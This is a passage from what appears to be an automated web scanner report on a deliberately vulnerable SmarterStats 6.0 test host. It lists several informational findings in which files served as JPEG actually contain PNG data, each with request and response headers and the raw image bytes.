Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:33:39 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BEDA3AB80"
Content-Type: image/jpeg
Content-Length: 6349
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d...bIDATx^....,...q.9..#.9.8g..........0>.....06.s.\\p..s...#..zzF...n...:.W....H...Z.^R+\e.C.....Y..F...S.*@..A.F@....
.D...>............+@...
..T.
.Dl.T.
...A4.+..P.*@..P.*0........@....@.-.f.9.....j.m]l[.X,M.u6.*@..Q`Z ..f..S....1%...X....biR...?K..T.*0!..@Sl. r.M..5.x..I...@...x
L.D{p..Ad...$;...M...~ggg...+..|.A........@B.x..G..6..n..../.32.B...r.8.....W..#{.9t.Q..L.D..r50.......D.N5...^.e.u..f. .5...U.p>7.U.`u.&...=w.D......{zm..\.M.D.......8...r.........Qz3$..5.vgRK......z..-..g.......t.....k..(.f3...._.&=J.... ..R=A...#.I.#...!s.D...D...D...VC..;.A...AD..D2...".d...-G.R..t.H..Ss.!"..O.2CX.VU.)7vI..T.).. :.:.."s.'.i.l..)7vI..T.).E..$oufy....[... :4.);o.;M....""..Y... ".R!..... Z.......AD..D...yg.5{...D8#..".+1"....w> ......".H.J..F.9....7.h..A.q%.H..A...AD.i\. ..7k.}.B.g..A.q%.H...At.M... ".4.D.i..5.n. ..AD.i\. ..7k..`A.3.. ...A.Q. ... ".4.D.i..5..k!.3.. ...A.Qo. ..w...AD.i\. ..7k.}...g..A.q%.H...A.-."..D.....".zs..}.B@#..".+.D..f..-.pF..D.W".4...D+."..D.....".zs....B@#..".+.D..f.oZ... ".4.4k..oVf.*m]l.:l.u..P.X...M.g.1.... ..AD.]L..o.j]..?.\...x.m..^mLy.}p.N..4..}....l@t.....AD.]L..j}n6..D..iFG...O.4....'....$,O/.......5..).UW..M.&.EN.2>.~biR...D_......1"J..N.I........Dc......H.2.Wd...Q|.j..S.3.m.mR.yM.Dew.E>..u.].
D.%...4BIY,'].)k6    .U.    #"...,....}.`.:H.....s.........5.u3...g.. ..f....8P.'x...k...J...gJ.{...V...c.F..D=\6.D..IDD.Jo.b.Y_.._....Na*I#L/%O...kI..r]. ...n.P.i4>nI...<v@..=...o....*..f=}.../C...#".?I...Q8n....Ti..Z..+?.4.Y. J.}    j..A....@T....Q}.YS.q..A.#."..A.E."..D....F.Q8P.[..&....a.f....U.......(..e!.4.. ..%.)G......W...X..,../X... ".4.9.....]1....Ey5..k!..8.>oA.3.. ...v......x..h..L$..D.. .Y.Dw}....D....G.....\+.
&.j*5f^=.n. .Y.D.. ..AD.i.n4.......i*4v^5.......3.h..p..8o..(CZ..<"...5....o.Z.D...1@cD.L.-.DmcD..^S.=.....w..;.>..O[... ".4~(..2"j...vX.....y. ..G......S.D8#.."...."..F....
..W.".y..l.(....1@#.."......<.......^^=.p.....    .e.B:...1.@..!.. ]3..O1..D.c....q.}.FD8cD.L.-.D..!.5..Qd'.)..... .........Z."..D...]%.SFD........V;.LS.q..A.<}...J.-....L.wH..Z...J..[.. .Q...!..>    .;>n....-.x..Q{DT..H....QGD..c............".H....)#"....Q.    !_.. ..(h. ....".h. .<....AT..W......Qc.F..D...)".<....A.?......?>.5.. .xfF.U...    ....rO"n..........>lA.3.. .    .4.9.....x..;@1
..[... ".4^.1".<.|..Ad....gq.}...g..A.... ..d....Mx5.2.7.....B. ".f...1.O...@_.".Yc...hD.7."..D...@.<.~.}....\.u...8..6..
.K.z.)..D.#~.qAq.}...g..A4_..........F.Q...v]>...>.V-].X...-..A.;........-.pF..D3.Q:..+{...T3:jFE.4....#...........B@#.....(.R...NV2X<...q...XT,M..a@.;........,.pF..D3..@_.j.)...........q]....H.yg........|._._....r$.0...,A.T.......I...K5....dwJG4"..=.....#".Wg.G.y...-...j.#;?...^.b..x..;.. Z& \.$....9...e.....p.H.N..u...|}.....}..8A._..'k.S:. z...p..h..#.R..#..(.>....A....m....m.2.h..A..,    ........2..1...p.....    .e.B..I.....eH....7...(..>..^Q.........2..`.q... ..t..8..aA.3.. .DBU.    .....y.)..;...@.....D8#......c.k.._..y~    ".>..^Q...m... ".f.".#O;...Y...=4..r."..".g..5;.g....V...}..
6......g..A43....kU[!.;k...3?zZ."...n+.(....c.F..D3.Q.h......|.2..j..wMt;0.A.f."..D...e|...f.<...._..-=4..+..D.]....q.]cA.3.. .... *..h...3..?..V.z..vMt;0.D...4.H.....eH...G$y...Q...Y...,
..o2.h...    <.h>..=..D...Rzh\~#..".H.....#.pK..q...t.^..D.....g... .8......<K.rr.1R.,..,.O.v*...L$..D.=..~Cq...FD8cD..H....)#...}...*..W"..An..(...zc.F..D....D.Yc..c[.jj7B^=......,...Y... ".4.6.........z<.ZS....A....m.A.-...q.T..."..i].]3.c.'..D..9.6.q...FD8cD.L..D.aO.I. ..*.C....F..D....O.....a..9.......nE.[]...."....+q*...('G...f...=|.28.l@j..W....Q...5.....#"    L.<..    #........
.....nE.[]....-.pF..D.O..D.^..&..D...nu=A.L@H.3...."..i]...A...r...Q}9.....-.x..Q.........j...(.b..D...AD.I"....4.9..z.....d...._aA.3.. .x.$..v.4.9......,..F..D./].....z...fd]l[...I...|.\....F#......g..At.AT.M...6?)2E .&.z........-j...e.D8#....
.*...Or.M..5wb...^.....v.... ..K...AD.]P.U.>".K.Y5....i.&.z..ggg~g..\WbC..k>./../.......#k+K.-.d.....D.....p..[....^lA.3FD..RA.._.`...f.e.n    G.D.....AD..D..`u.?v.RmP:H.z}...?...@...E.D8#..".(..n0.:..0p}.9..)..S..?.g.......B. "..8..W[..,.a.cD...n.t4"......AD.i<k.cD}.o?..Cc.p..p....H.-...V....-U..eH.2..f....^...'..    .q.=.FD8cD.L..D..b...A..d.&,FAt.y... ".4N%..#....A..h.|\. ....".. .(.....pn..'...~.\c.F..D.WbD.Q.%..D..=n.P.D.. ..AD.i\. ..7..~m.... Z& ._.R.....eH..1.!...s{.<.8..m#".1"Z&.."    V'.G.5.~Rw... .<....D....$.cD4dD..k.....P#..".H..8.:".d.f.-...D.W.......Yr......I.~G.5.._..W.8..a#".1"bD.q'    ..5..k..@v..Q...tc.F..D..F.p^uD..@v....2.!...6wI..Z...........i6"..#.e.. .`u.y.........<.j..A.q?    .........`t.kv.S...AD..D...y...p..F.A.d."..D......i.k....n.....D...t..R...!L.N..T.H>5.n.c7@....O2.h....<.....j.......#....1.8..hA....P..C.Ww....U\...m. ..D.q.7.....,.p......).......>...m. ..D....zEA........0.a....M)o....u..P.....AA......A4...\....o...A....N....F).......3.h....5.!RI...>.}.....n...........D8...S..].c.....5P.....!A..R\....p.r@...    ".I..}.z5.r.....m.6.........u................ ..(...}....y.@.-.z.1.^..).ks.Ej.e.D    .GC. ...._....@......\4.FA......hx@. z..b]@w.mM..._Z]..s.........*....<......Q.svvf...].|.\.t.F............:"2-
..DD)o"G99.puf9)o..6.n9.........C.=$kU..r....Wm....w.s....i..P 2...s.Y....5)...T U...".N...T1..
P.....D2...
P.!. ..T....T....Q/...
P.!. ..T....T....Q/....7......(#../{...F......$,....nr.....k..S.D.......F.7u`e:a.....Q.2..4p]XN..&....p"#A4...=c.y...."&...(w.Au.(G..N,..R.M..r..... .H..m..H\TT..P.\....8.._..e.a..........R....... .H....e$.....'.r.Q.a..^p..W...h..k.C..A4........L    .^]&m.}..,..E..6iu.Q...B.(nu....z../Cq..=..V....q}.,g.D(....-G;..]....m...Y.e...`u5.b.....we.(c.T.......T.6./.Sk.h.!....~T.
$+@.%K..T.
.. ....~T.
$+@.%K..T.
.. ...v./.1[8..u.Z.#wm...*.u#@].l...,.r....lt]..t....RV(.~jeT.......&..jv.+v..s.......N..uv........o..h9..o..+._?|.s.......s.3....,..Sk....ng.2...e#.....].s.t{i..c..".T....r.W..4...F.a.}..~.E..RF......<VF.:*...J...K..u.Z..k..T....8F.O...T.....+.].....a.M.n].&eri
Xk......u...(..D.}.K.4.Q..PI:../.\u/..I@T... ..6.b.`..P.S
'.i...w._g.V...o_..VB....}...,...q...k.RLq....f0.TX.n.....T.[..C,..........t].^]....]y}.
.]....3"...*Mm..0.T.O.....).V.@D.;#......d..~.D
.......w    k.:.J....    .u..we...MK@....N.~....NLL...o.hv7F.
...<#..A..dQ.>..{.f...._5.X}.......m.jg.n@.!.......)@..dc&*@..
.DH5y/*@.D
.D"...
P.....RM..
P.....H6f..T...A.T....T@..A$......@*@.!.......)@..dc&*@..
.DH5y/*@.D
.D"...
P.....RM..
P.....J.!%..6d....IEND.B`.

10.44. http://vulnerable.smarterstats.6.0.host:9999/Temp/afa9a3022c3e456690253161fd12125c.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/afa9a3022c3e456690253161fd12125c.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/afa9a3022c3e456690253161fd12125c.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"444009411","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 20:06:01 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB697FB9D99A80"
Content-Type: image/jpeg
Content-Length: 6302
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d...3IDATx^..Y.,E..q....Q.D.\PA..Q...qp.].}....#......4.J.......O7..i.]=U5u..,..U....qi..T....OfV.:...
@.(0..g.......... B.@.(0.......'....@....P`t..../.N.
@...1.....
.D._........b.
@.....F..8.(..........K..85xU.mB......b.X.s\r(...S`|.......K.9.....8...O-....KLj..>.O.....^..A.....`o.D.......YO;.j....W.
@.:...D.Tjpj.3...[.A...Bv..l...K..+..._|1.K/..N.>......x..W....D...?5.X'
.YM...Mj..Q[.....v..J.*.'.....?...a.k....w)_.?..h....DS*...tj..q...V.tRoZ_.B..?.Z.N...O...|I..T..@..S..x.....Xs.P.8..,J......s....R.tRoZ_    D05.....\..A....._A).......l..DR4..K....o...M ....`<.X,..9..o...5k.....Y.+B...D.....D~..X....VA[.H ...-.8.....~gj...A.    Q][.H......Z_    D.55.. .......\J-.8..."4..Adh..@..a..L...i..9-.......@..qb. 2Sk. ......D......L..6K.x..J.....w.D..'.....5...._9gh..@d6......f)..Z_../....".........zFt.....D....BF$.R..p<k}....B...".........zF...#;..f................f)..Z_..........(.f5.65.f5@....3...Adg..\@...p.jnmjn.j.. ..     ...........Y... .!.=.S.. ...RwR..~..m..]<?.(.?...A..s..Z.N.......UQ..}....K<1_...Y.....dN.j}m.D.>..j...]..... ..Y..M....7^...$.r..z.F..{..05...,.f5..y... J.    ...J ....D3..5.P....vk....\..@.{E.v......S3Z6.....$.$.J.1...7;gh..v #....1.........~.Adg..@$.=.#."....nR1%.r.D.'...gVy;.H~.$A'.......M......4...........Y.+..G....D..^.. .K.......@t.#....:aj.....17...g~...!#BF$.=X.6.N..'u.......L .....5"3.&.}...^.....``j...*0%A'u...2....2"dD.xFFd...3..ot..."..l8a.Z..6K.x....0.P...h6 J........5..<........}*(.."...m.p.x..J ....D3.Q..Q.#...........[T..z.........:gh..L@........./|!.^kf.Fj..D....<... .#.B.3..T..h...l..e...C....q.H.+B..B....J@..V-04k=..Nv.u.Y.......|^...zQXK......](?@.o..O^oj(.?.G..~.Py.Q.=d......r..0y.q.w.......k.....Zh}%.}....U.....L...u..o........kT.|../......At.....DU...}.........M.....[...A...5...5...V.. J.    ........M ..D.@...(./WO;hs=.....^..].k%.c.F.w..+.9..x~.JT.I0H...c..o.........-.ci.4tC.$.......ZO.DO\....D5..s..#.G...0/s$@$.. .M*.._n.H..Sqyf...u...v.t;.H..$.....b...7M.Q..Q......4\...D|..#.p.x..J .....*@.<......='.J....jk........X..4U..Q.i.R.A..kJ}. z.jSCFTSF.{(..).....!#.+....Y.._n.H..S1...kDCO...u...".E......W...25dD5eD....8.H~!.p.x..J ....D...U.5fF.'.9a6^[.H......Z_...y...@T....VO.7S...6...@..A......Z_    DW..@T..ZO.w.+v.._.ly...O.S.... ..`. ......DU.h8#..&...Y...E......D;..G=.. ..D.$..M|.U<-......H....@.K ......D..H....$..skSS...P.zGkV?z.....fu.5..!D..........:j..9...b......!#.5#j...74._...7...u.15....V;hs=..c.......@4*.r.4.]F.|v.|.....B/..rS..f.........z.I.L......a."C..F.Q3%.nYX........ J....e.Dv...
..yk....>...1.5.!."4.....DU..u...h.Ej.H3<..fr1'..=.Adh.Qm Z.O3m.....]...=... ..D..P#!@.K ......DU...x.t2..t..........D......|x....xz..;g.kv.R.";..F..<pk<. ._..-V.......D..|......RN.D.~.9C..."........t....~.A#..N..3...2"........W.^....!#.&#B......H.~,.vs}M.O...|....*@......$.J...... .3..
.Y..o:..F...J.y...T..805..... ..nLI..(..I...^u.uB....s.....e..S.j....G40jb.r........(...x~.    .{.........).##....    :.7./m.W..gM ..    eF$.....(f8.. .-...e.....;Z<...<......(...fu.....5 .%F..+......Dm(!#...h...g.....A(|.2.J2..
..Y.4...i..a....jL..a.....(..b'0B..gL ..D.<.o....h.u..._ _eJ..e.Z...b5.X}...Dv..U...}D..Y.../L...........VYZl...Y*S)...#..P..@T...I.{.G.EZ?...F...    .M0H.M.D......"...h...!.....9.. J..... ......D.a.;..f<...'...>....D....F...'....H-..VG.Dr%....<... ..D.....z8....<.K.    .....t..S./7J$}.........w..... .k/    :.7.....{..!#."#j?.J=t*.r..Dr..p.x..J :....*@..a.9.eV.z.kz.c*...Ji..........-n+.N....\.:. ._.I.I.i}E...ISCFTKF$........C...g....sM ..D....;.9......\U-.8......M..3f+.t.2..V.m.".u....Y.+....05dD.fD..T.R..(.O..7Ar.n.....@..P..Z8p<k}%.}.....@.y.uC.j..5.s".."...m.p.x....f75.... .\..[..jO.=@....At.9...2..3.V.v=......./.../.......Vnl>.......f).3......c....
"N...-."......w..Adg(._E..\.....Q3..N....\.^.m..........25dD;..u_..Q..5.Q.z.p.....9.c.m.....}....6{..V..E...>jj..f.....jV...&.$.....x...@d.{.?.....04...D)?f...g:gh...A....cq..O.vk.H.[>%.r.D.'...gVy;.H~.$A'......;?lj....I...q..\J-.8..."4..!S..."N..m........Y.. ..='.......k......@.ASCF..........~................D.........0...".....\Jm......2....@..qb....Z.....>.. .....2"...,..Y.+B..B...".........zF.^.#;..v.D.......D.O...GdDrJi...g........@.S "......8...\@....G.. ...qM........C.?Th.e.....V......3";CF.K.Q...{K(.A...GAQ
......].Dv.......9...
....[=4 B...-.o...4...].....oG.6hSQ}........N.#......2......X.M._M.2"vQ}b..D..    .l.&G..b.!.......Q.jg.~..."...K../a.>.....0....:K.{.F............W..Th.W. "@..-.....6....6v.."........-nr.........fjc..3.$.
.....?.....Z.`O.hjc.Z..74J.Z..dDDF..u..Z. z....l.>q..$S.|?2".Z.c.".DO\....=h.........'..".Z#.....=v.s.6..M z....'.p..8j... "@........6..M.6v.8.. ..5B[.....K.3...m...."C...6n.m.S3<.".z......=p.s.V....Adg....7;k+    =............O\......7x...    ..np..H_..z.....N..@D.....3............~...9c#}..b.n...4.....L....0$]....15r ..8.n..A.z.";#.<|._..5....f.%...0....Q)@..y.zS...~~...Fg.W....h......H?.\...l..e...6'."Mz..|.>^.'.552....9C[.../#.....5....<....N......F.2\..k..........[dD....../r....h..... ....s#.....DvF...,....U`
....5[.E....4..=.:ght....m.l-....
.w.}2...)%..x.......i.{.H_.2W........l...5.O.8......4@....C.=.........o+#.U].y..    .J.*..d.J...~.>......7._~.e....-.'.`)_....SI_s.O..Y..,./F....P`.
..D^1...6..wC.(.Y...hs...
@.Z...j..8.(..
.D;|..u(P...Q-W....vX.....w.H..@.z)..O..`._...+......9..c.x...5@.Y...1.:.....Qx6.    .R.J.YA...x.8&....!@..kmS*p.....=..h.>..b....'T.W)?.......K^....6....Q..`..a!+:p.....}.X..B.......W.W)?)..~..i.1a5^z....    K?F...5.. *.......'(...~9!ZR.........Q.sRc#...T..,|..O..@.g52... ..).......,>...s..(.d6-...*..d.J...~y#"..@..UV..V..z...c....Q.x..&6*.....}*.k...G.....f...
@.-+..mY`|=.......6k..P.
lY..h..........@.Y#Q..0......@...\..u'.4................?.?T......8I..w.77....W......c. ...1.....w..U..1...9..W..{..j.f.+.}...S...z&/=...S.....C....[..w...yZ ..U.....5....v..DvZ...~...).u.H.....W....Cw...YQjJ..s...)_.w.m.r..tam.'.u......7...[.D[P.|.Q..[>..z.Uw..........t..6..IpS&....V..d.....h.YB..[."..;..&..N....e..S".....l.jmp..r..b.......GM..    D.^...y=... .|...~...y.-..r....!.."n.e..N..'.3.,..N-.....d3M.@......g....m..Y.$.. #..aSn.Y.<z.+...VW.b.&K.......3....3......,.8\(.:.3.54-...;.>. 2.q._Bm.v...[>I!r...}o.k.....O......n.....ke.kh}f{.......s..P...X#*,8.A.(p\...Q.....
.D._........b.
@.....F..8.(..."......+...~    p.P.
.D..(..FW. ............P.
...@4.%.    @.(..!.....]....I..... ....IEND.B`.

10.45. http://vulnerable.smarterstats.6.0.host:9999/Temp/b2972344c54b45e38070638051bc9478.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/b2972344c54b45e38070638051bc9478.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/b2972344c54b45e38070638051bc9478.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:29 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: "1CB682F87B92300"
Content-Type: image/jpeg
Content-Length: 7503
Connection: Close

.PNG
.
...IHDR...l............    ....sRGB.........gAMA......a....    pHYs..........o.d....IDATx^....s.]..w..?.UTQ.b.a.    a2.f.<
.'......" ..E..a.M.$.    ..
WQ^.]k.....q..W........W.....<...;..v..............n.N.....@....@ ....W..!.... ....$..M.... ...... ... .....@.... .... .... .@p..[.    ...@....@....=.... ...... ... .....@.... .... .... .@p..[.    ...@....@..I....<.f..X..fw........... .... .I`:..|...e........:...g...o..yZg.C.G.......@........l.`Vv.........@....@....    L'..7..nZyI.r.m}.~`K.....C.G. .....@.....N`.{.s....M    lggg.....k<......_d`@.....=@...7......)s:..r.l.....m.$ZB._.......`.q....?.....3O'...a....n....=f..........-..8,.=.n...."..Cc..O`...........z..>..z..|...'.>....}.?....&....%..%}.yx...'.=3.....{...M.'.I|R1O...T...'../.V...j:..{...D.6.O*..+.I..K|r1.2a........'.IMD`...b....T...'../.V...j:..{...D.6.O*..+.I..K|r1.2a........'.IMD`...b....T...'../.V...j:..{...D.6.O*..+.I..K|r1.2a........'.IMD`...b....T...'../.V...j:..{...D.6.O*..+.I..K|r1.2a........'.IMD`...b....T...'../.V...j:..{...D.6.O*..+.I..K|r1.2a........'.IMD`...b....T...'../.V...j:..{...D.6.O*..+.I..K|r1.2a........'.IMD`...b....T...'../.V...j:..{...D.6.O*..+.I..K|r1.2a........'.IMD`...b....T...'../.V...j:..{...D.6.O*..+.I..K|r1.2a........'.IMD`...b....T...'../.V...j:..{...D.6.O*..+.I..K|r1.2a........'.IMD`...b....T...'../.V...j:..{...D.6.O*..+.I..K|r1.2a........'.IM..l....R.!a.X...D............m......8.......J\.....S.QB.._<x...?..>.rf.}..c.. .I....K9.E..6...*f..N..>...    ..${.[..    lR+5U......}..c.. .I........h..&.RS.,Z......=.>...dO`..#.Mj...Y.......{.}..6....~1..E..6...*f..N..>...    ..${[`........JM..hy...?.....l..+..B.k...Mj...Y.......{.}..6....~>..h..&.RS.,Z......=.>...do.l...[.A`.Z..b.-.t.....{...M.w..y.k...Mj...Y.......{.}..6.......[.A`.Z..b.-.t.....{..T..j.f..f......<_..n./...t..c.c.lO.wzk.A`;.-..>..w....c..O`...|...y....b......o_.....i9.....{..+..\.k....G.L..,Z......=.>.)......{.......]...C....W`{K.l....O.L.>,Z.y....=.>.    .............`....y......rvv.J8.i.........s.l.F..1.8..}.7...=@........9...G3.l..h;..V^..i'...v..q...l.k..;l......2..~.t......'0.....D...mw.Z|I..9.E......q..Ek..Cg....=.>.    ...?.Hy#m....*-....G.;.........)..`....a&r..-.D.....{....[..v..c.'...........m.."<......q..a.:.tvz.7'.O5...S...ha.\..m...p..8......{.}..6....~...H...Mj...Y.......{.}..6.....G...JM..hy...?.....l..+..T.a.6.lR+5U......}..c.. .I.......D.6.lR+5U......}..c.. .I....8...Vj..E.;]......'@`..]..'..[.A`.Z..b.-.t.....{...M......-. .I..T1..w....c..O..&.....rX.6.lR+5U......}..c.. .I....8...Vj..E.;]......'@`..]......). .I..T1..w....c..O..&.....H`.Z..b.-.t.....{...M.w....;l...Mj...Y.......{.}..6....~..?.....JM..hy...?.....l.=.....6...*f..N..>...    ..${W`.....m...Vj..E.;]......'@`..m...r`.6.lR+5U......}..c.. .I.....9.E..6...*f..N..>...    ..${W`........JM..hy...?.....l..+....?.....JM..hy...?.....l.=.....6...*f..N..>...    ..${W`{c.a.6.lR+5U......}..c.. .I.......X.6.lR+5U......}..c........4./.y....f..XE.9|...8..b...W..5......t..*..J...`."...b6O....../.|.....r..7...h....O..2.8..=.x...5....R..ca.&.m...N[.....~.....[.A`;....{....=.}..c.....v_...i[-xI.@W.`.H.k...-..x.k`.....Y...c..O H`..Ps..D...r=....j..E.;o......'."...[..w.....ks.....B.6.lq.....E....}|.}..c.......6zp\..h......../..h....K......MO9"..h{_...<.h.[.....w..5.......S.z../O.......=.>...-.._w.....~!E.....j..E.;k......'`l...{.4...]o......r=.....q..Ek..Cg....=.>.k`...{..n;....)
..;.....~.
];l...R.A`;.-..>..w....c..O`..m........m..x..r~..o.n.1+....'^H....G.L..,Z......=.>. .m.....d...........Z.....L
......>.3...hy...?....B...?K.*..OL8..........}&...^.w...[....}X.......{.}.a....%Z^....@....l.&.7....s.`.._}4.(.5....................4....h'......Dw....y....^....N.v......'.c/...........N..>...<........[.#.......{.....zI.5y.-..%..3......H.}..c.....[.Y........M...-..x.k`.....Y...c..O...x..../.(ZX+.C`...6kX.......{.}............C9 E..6..Z.f.....>...    ..${[`........JM..hy...?......m......A..kp....a-. ...<..E.;y......'`l...O%..!..1R.Dz\........3...hy'..?....B......G    nWo.....5......O...-v..yu,ZCj.~,.O7.....$O?.......l_...o...;F.+.}W.l...m...q..8......{.}...[.Am.F`..#.-..x.k`.....Y...c..O D`....F^
u......S.A`..0...X..q&.y.o:;...........i......r=....l..'N.......{..5.E...kp.$...|.6.lZ/.T....-.}..c.. .I....8...Vj..E.;]......'@`..].....[.A`.Z..b.-.t.....{...M.w..o{.GR.A`.Z..b.-.t.....{...M.'.u...&.RS.,Z......=.>...d.
l..w.....JM..hy...?.....l..-..I.l...Mj...Y.......{.}..6.....%..h..&.RS.,Z......=.>...dO`..#.Mj...Y.......{.}..6.........h..&.RS.,Z......=.>...d.
l...[.A`.Z..b.-.t.....{...M.'.u...&.RS.,Z......=.>...d.
l...s). .I..T1..w....c..O..&....7...m...Vj..E.;]......'@`..    l]p$.I..T1..w....c..O..&...../.K...Mj...Y.......{.}..6....^..[.A`.Z..b.-.t.....{...M.'.u...&.RS.,Z......=.>...d.
l_....h..&.RS.,Z......=.>...dO`..#.Mj...Y.......{.}..6.....6..E..6...*f..N..>...    ..${W`..?.p.6.lR+5U......}..c.. .I....8...Vj..E.;]......'@`..].....[.A`.Z..b.-.t.....{..$..yZ.gi6.......<_.O...........l...u.t.....K.}..c...``[...j.../.|6O.....E.|...#....W`......[....]X.......{.}...l..]0+A..n[.....L
......>.3...hy...?..........|......~`K..z'.....rvv.J8.i................t.\....x....=P........;..-...^...........9.E...Eh.q..].q.....?.......v-...sJ/.F.k.z.l....\...8..6..Mg..}s.....am.c...J....a...}..a...6E....3......H.}..c...``[-........_.^....v..&....G...n...Y..s....{.}...lcb......[.A`.....b...+.;;...O..&....;r`.6.lR+5U......}..c.. .I....e9.E..6...*f..N..>...    ..${.[..    lR+5U......}..c.. .I.......l.6.lR+5U......}..c.. .I....%9.E..6...*f..N..>...    ..${W`{0..h..&.RS.,Z......=.>...do.l....`.A`.Z..b.-.t.....{...M.w../.a-. .I..T1..w....c..O..&........m...Vj..E.;]......'@`..m..wr`.6.lR+5U......}..c.. .I.....9.E..6...*f..N..>...    ..${.[..    lR+5U......}..c.. .I.........m...Vj..E.;]......'@`..]...s`.6.lR+5U......}..c.. .I....8...Vj..E.;]......'@`..].......m...Vj..E.;]......'@`..    l]p$.I..T1..w....c..O..&........h..&.RS.,Z......=.>...do.l...[.A`.Z..b.-.t.....{...M.w..W...m...Vj..E.;]......'@`..]...9.E..6...*f..N..>...    ..${[`........JM..hy...?.....l..+.}n.k...Mj...Y.......{.}..6....^..[.A`.Z..b.-.t.....{...M....G?.^.l...Vj..E.;]......'@`..]..srX.6.lR+5U......}..c.. .I.....9.E..6...*f..N..>...    ..${[`........JM..hy...?.....l..+.}V.k...Mj...Y.......{.}..6....>3..h..&.RS.,Z......=.>...do.l...[.A`.Z..b.-.t.....{...M.w......m...Vj..E.;]......'@`[../.i6...|y.{>.l]p$..n.......B.}..c.. ......EZm.[Z...ofs...x..S.A`..0...X..q>t..}..c.. ..w.vw....^.C`..c....o....>..W........?........../...........+E......}g.:.]{....=.v...W...).8v...........G.....v..uW@[-.l..o;..
l..w.....-...).(!..W    k.x.k..r]..JX.........|....>.n..:.U..._u.r.k;.U..k....F..>_%.=..G..r]..JX{.....r]}.J`{..>.n..j......Ox........T......O......=@.....=@....O>......v...%.Ag...9v7............2.`...Fy..........G........g.y....`....q.9
.5j...?...G..T....=.m-P....."GB....@.......;l.m.... .... .B...b.....@....@......@....@........O...... ...........G.m>....}m..k............_hyC.......C...S`...........c#7....7....z..T.....g......R./.v....6^g\...b......OW!y.?....y...?.;.M........O`.[........&".X~i....m'....$.w.v?......
l<....lw.Jh.......{.....6.9gT...D..Q.W..    .....{l.wX../..;.e...D.o...2..#..;....y..6b.r*Q`ok\<....v..}.D..k.{..`'...D.q....G.{.9..pF..    ...vhR    l.l.I.H.5..........E.Q....7&0..~u.=o~.c<|^.%...m.ih.....u.#0...V].{v.j!+..a..S.........D.g.-..p=w    .......<....M.l......;.....0.?.....O..zl.    lc. .A....@...*..l.p.!.... ...c    .....<. .... .@......2..@....@`,...X......@...... .U.Q.... .....%@`.K.. .... .......J8..@....@.....lcIs...@....@.R..V    G... .... 0...m,i..... ....T
..*.(C....@..... ..%.y.@....@..J..[%.e. .... ..X........1.y....IEND.B`.

10.46. http://vulnerable.smarterstats.6.0.host:9999/Temp/b7378ea2600d4d34ad1d031c4003a06c.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/b7378ea2600d4d34ad1d031c4003a06c.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/b7378ea2600d4d34ad1d031c4003a06c.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
